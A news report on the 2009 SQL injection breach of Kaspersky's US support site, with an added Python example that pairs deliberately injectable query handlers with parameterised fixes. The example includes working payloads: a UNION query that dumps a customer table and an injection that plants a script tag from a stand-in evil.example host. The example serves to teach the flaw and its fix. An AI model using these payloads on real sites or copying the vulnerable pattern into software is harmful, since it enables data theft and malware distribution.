Kaspersky Confirmed Data Breach on its Website

Moscow-based security firm Kaspersky Lab confirmed on February 9, 2009 that a database containing customer details had been exposed on its website for nearly eleven days. The company said it learned of the breach when Romanian hackers reported it on February 7, 2009.

Kaspersky Lab said the exposure began on January 28, 2009, when website administrators made changes to the 'support' section of usa.kaspersky.com.

A hacker who identified himself as "unu" claimed responsibility for the hack and said that Kaspersky's site was clearly vulnerable to SQL injection. Security specialists explained that in an SQL injection attack the attacker slips a small piece of malicious input into the database queries that supply information to the target website, so that the input is executed as part of the query rather than treated as data. Criminals most commonly use SQL injection to hijack business websites and distribute malware through them.
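The mechanism described above, as an added example that is not from the original article and not Kaspersky's code: a small Python/sqlite3 model of a support site with an injectable article handler beside a parameterised one. Everything in it is constructed for the illustration and is an assumption, not a description of the real site: the table layout, the e-mail addresses and activation codes (chosen to mirror the kind of data the article says was at risk), the hypothetical evil.example URL and both payloads. The read-side payload pulls the customer table out through the article lookup; the write-side payload breaks out of a string literal to plant a script tag in every article title, the pattern by which an injection flaw lets an attacker serve malware from a legitimate site.

```python
import sqlite3

# Constructed sample data for this example; not Kaspersky's real schema, records or codes.
ARTICLES = [(1, "How do I renew my licence?"), (2, "Installation fails on Windows XP")]
CUSTOMERS = [("alice@example.com", "AAAA-1111-BBBB-2222"),
             ("bob@example.com", "CCCC-3333-DDDD-4444")]


def build_db():
    """In-memory database shaped like a simple support site: public articles
    plus a customer table the web front end should never expose."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE kb_articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE customers (email TEXT, activation_code TEXT)")
    conn.executemany("INSERT INTO kb_articles VALUES (?, ?)", ARTICLES)
    conn.executemany("INSERT INTO customers VALUES (?, ?)", CUSTOMERS)
    conn.commit()
    return conn


# --- Vulnerable pattern: the request parameter is pasted into the SQL text ---

def get_article_vulnerable(conn, article_id):
    """Imitates a handler for a hypothetical URL like /support/article?id=<article_id>."""
    sql = "SELECT id, title FROM kb_articles WHERE id = " + article_id
    return conn.execute(sql).fetchall()


def rename_article_vulnerable(conn, article_id, new_title):
    """Imitates a handler that stores a user-supplied string with the same mistake."""
    sql = ("UPDATE kb_articles SET title = '" + new_title + "' "
           "WHERE id = " + article_id)
    conn.execute(sql)
    conn.commit()


# --- Hardened pattern: validate the type, then bind values as parameters ---

def get_article_fixed(conn, article_id):
    try:
        article_id = int(article_id)  # rejects anything that is not a plain integer
    except ValueError:
        return []
    return conn.execute("SELECT id, title FROM kb_articles WHERE id = ?",
                        (article_id,)).fetchall()


def rename_article_fixed(conn, article_id, new_title):
    """Returns the number of rows changed; the title is stored literally, whatever it contains."""
    try:
        article_id = int(article_id)
    except ValueError:
        return 0
    cur = conn.execute("UPDATE kb_articles SET title = ? WHERE id = ?",
                       (new_title, article_id))
    conn.commit()
    return cur.rowcount


# Attacker-controlled parameter values (constructed for the example).
# 1. Read-side: satisfy the intended WHERE clause with a row that does not exist,
#    then UNION in two columns from an unrelated table.
DUMP_PAYLOAD = "0 UNION SELECT activation_code, email FROM customers"
# 2. Write-side: close the string literal, replace the WHERE clause so every row
#    is rewritten, and comment out the remainder of the statement ("--").
#    A site that renders titles unescaped then serves the tag on every page.
DEFACE_PAYLOAD = "<script src=\"http://evil.example/x.js\"></script>' WHERE 1=1 --"

if __name__ == "__main__":
    db = build_db()
    print("legitimate request:", get_article_vulnerable(db, "1"))
    print("customer table dumped:", get_article_vulnerable(db, DUMP_PAYLOAD))
    rename_article_vulnerable(db, "1", DEFACE_PAYLOAD)
    print("all titles after defacement:",
          db.execute("SELECT id, title FROM kb_articles ORDER BY id").fetchall())
    db = build_db()
    print("fixed handler, dump payload:", get_article_fixed(db, DUMP_PAYLOAD))
    rename_article_fixed(db, "1", DEFACE_PAYLOAD)
    print("fixed handler, payload stored as plain text:", get_article_fixed(db, "1"))
```

The fix is the parameter binding, not the `int()` check on its own: binding keeps the value out of the SQL grammar entirely, while the type check merely gives an early, explicit rejection for the numeric parameter. In the hardened handler the script tag is stored as an ordinary string in one row, which is then a question of output escaping, not of the database.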

After the hacker published his findings on the HackersBlog site, security specialists said the flaw could have let any attacker install malware on Kaspersky's website. Gunter Ollman, Chief Security Strategist at IBM, said he was worried that such a critical vulnerability could be exploited to hijack legitimate renewals and purchases of Kaspersky's software products, for instance by directing customers to backdoored and malicious versions of the company's software, as reported by bit-tech on February 9, 2009.

Confirming the SQL injection attack, Roel Schouwenberg, senior antivirus researcher at Kaspersky, said that about 25,000 activation codes and about 2,500 customer e-mail addresses had been at risk, as reported by Computerworld on February 9, 2009.

Schouwenberg also acknowledged shortcomings in Kaspersky's process for reviewing the company's internal code, and said the company was now applying that process much more strictly.

Kaspersky has also engaged another security firm to audit its systems independently.

In a similar incident in 2007, hackers used an SQL injection attack against Microsoft's UK website to insert HTML code into its pages, which defaced the site and also exposed it to malware.